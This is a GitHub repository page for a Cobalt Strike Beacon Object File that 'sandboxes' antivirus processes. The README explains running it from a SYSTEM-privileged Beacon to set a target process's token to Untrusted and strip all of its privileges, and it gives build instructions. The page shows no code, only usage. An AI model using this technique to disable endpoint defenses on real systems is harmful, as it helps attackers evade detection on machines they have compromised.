Skip to content

RobertDiep/sandbox-process-bof

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Sandbox AVs (or other processes)

This is a BOF implementation using direct syscalls of the excellent technique by Elastic's Gabriel Landau. Make sure to getsystem first using Cobalt Strike, or elevate your shell to SYSTEM when running standalone first!

Usage

Note: only x64 supported currently!

Load the CNA script in Cobalt Strike, then run sandbox-process <pid> in a Beacon that has SYSTEM privileges (easy using getsystem).

This will set the token of target process to Untrusted as well as strip all token privileges.

Building

Make sure mingw-w64 is installed and run make. The BOF will be written to the bin directory.

Running make test will result in an x64 executable you can use for testing or when you're on a target system.

Credits

About

A Beacon Object File (BOF) to sandbox a process

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published